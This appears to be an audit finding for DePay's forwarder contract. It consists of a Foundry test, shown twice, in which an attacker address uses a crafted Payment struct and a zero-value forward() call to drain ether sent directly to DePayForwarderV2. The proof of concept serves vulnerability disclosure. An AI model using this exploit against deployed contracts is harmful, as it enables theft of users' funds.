Falilah · September 3, 2023 16:25
diff --git a/direct.sol b/direct.sol
 / SPDX-License-Identifier: UNLICENSED
 pragma solidity ^0.8.13;

 import {Test, console} from 'forge-std/Test.sol';
 import {DePayForwarderV2} from '../contracts/DePayForwarderV2.sol';
 import {DePayRouterV2} from '../contracts/DePayRouterV2.sol';
 import {IDePayRouterV2} from '../contracts/interfaces/IDePayRouterV2.sol';

 contract DePayRouterV2Test is Test {
  DePayForwarderV2 public forwarder;
  DePayRouterV2 public router;

  function setUp() public {
    forwarder = new DePayForwarderV2();
    router = new DePayRouterV2(address(0), address(forwarder));
  }
   function testDirectEtherSent() public {
    uint forwarderbalance = address(forwarder).balance;
    //pranking a ramdom user;
    address randomUser = makeAddr('randomUser');
    vm.startPrank(randomUser);
    vm.deal(randomUser, 5 ether);
    // ether sent directly to the forwarder is 5 ether
    payable(forwarder).call{value: 5 ether}('');
    vm.stopPrank();
    console.log('forwarder balance before and after ether is sent directly');
    console.log(forwarderbalance, address(forwarder).balance);

    // get an attacker address  to withdraw the stuck funds
    address attacker = makeAddr('attacker');
    uint attacker_ = attacker.balance;
    address NATIVE = 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE;
    uint paymentAmount = 5 ether;
    uint feeAmount = 0;
    uint amountIn = paymentAmount + feeAmount;
    address feeReceiver = makeAddr('feeReceiver');
    //re structured the payment struct to a different payment receiveraddress and change the receiver type to 2
    IDePayRouterV2.Payment memory payment2 = IDePayRouterV2.Payment(
      amountIn,
      false,
      paymentAmount,
      feeAmount,
      NATIVE,
      address(0),
      NATIVE,
      attacker,
      feeReceiver,
      0,
      2,
      '',
      '0x4589000',
      block.timestamp + 7 days
    );
    //attacker calls the forward function with 0 msg.value to withdraw the stucked ether;
    vm.prank(attacker);
    forwarder.forward{value: 0 ether}(payment2);
    console.log('attacker balance before and after the withdrawal');
    console.log(attacker_, attacker.balance);
    console.log('forwarder new balance after the attacker withdrew the stuck ether');
    console.log(address(forwarder).balance);
  }
	/ SPDX-License-Identifier: UNLICENSED
	pragma solidity ^0.8.13;

	import {Test, console} from 'forge-std/Test.sol';
	import {DePayForwarderV2} from '../contracts/DePayForwarderV2.sol';
	import {DePayRouterV2} from '../contracts/DePayRouterV2.sol';
	import {IDePayRouterV2} from '../contracts/interfaces/IDePayRouterV2.sol';

	contract DePayRouterV2Test is Test {
	DePayForwarderV2 public forwarder;
	DePayRouterV2 public router;

	function setUp() public {
	forwarder = new DePayForwarderV2();
	router = new DePayRouterV2(address(0), address(forwarder));
	}
	function testDirectEtherSent() public {
	uint forwarderbalance = address(forwarder).balance;
	//pranking a ramdom user;
	address randomUser = makeAddr('randomUser');
	vm.startPrank(randomUser);
	vm.deal(randomUser, 5 ether);
	// ether sent directly to the forwarder is 5 ether
	payable(forwarder).call{value: 5 ether}('');
	vm.stopPrank();
	console.log('forwarder balance before and after ether is sent directly');
	console.log(forwarderbalance, address(forwarder).balance);

	// get an attacker address to withdraw the stuck funds
	address attacker = makeAddr('attacker');
	uint attacker_ = attacker.balance;
	address NATIVE = 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE;
	uint paymentAmount = 5 ether;
	uint feeAmount = 0;
	uint amountIn = paymentAmount + feeAmount;
	address feeReceiver = makeAddr('feeReceiver');
	//re structured the payment struct to a different payment receiveraddress and change the receiver type to 2
	IDePayRouterV2.Payment memory payment2 = IDePayRouterV2.Payment(
	amountIn,
	false,
	paymentAmount,
	feeAmount,
	NATIVE,
	address(0),
	NATIVE,
	attacker,
	feeReceiver,
	0,
	2,
	'',
	'0x4589000',
	block.timestamp + 7 days
	);
	//attacker calls the forward function with 0 msg.value to withdraw the stucked ether;
	vm.prank(attacker);
	forwarder.forward{value: 0 ether}(payment2);
	console.log('attacker balance before and after the withdrawal');
	console.log(attacker_, attacker.balance);
	console.log('forwarder new balance after the attacker withdrew the stuck ether');
	console.log(address(forwarder).balance);
	}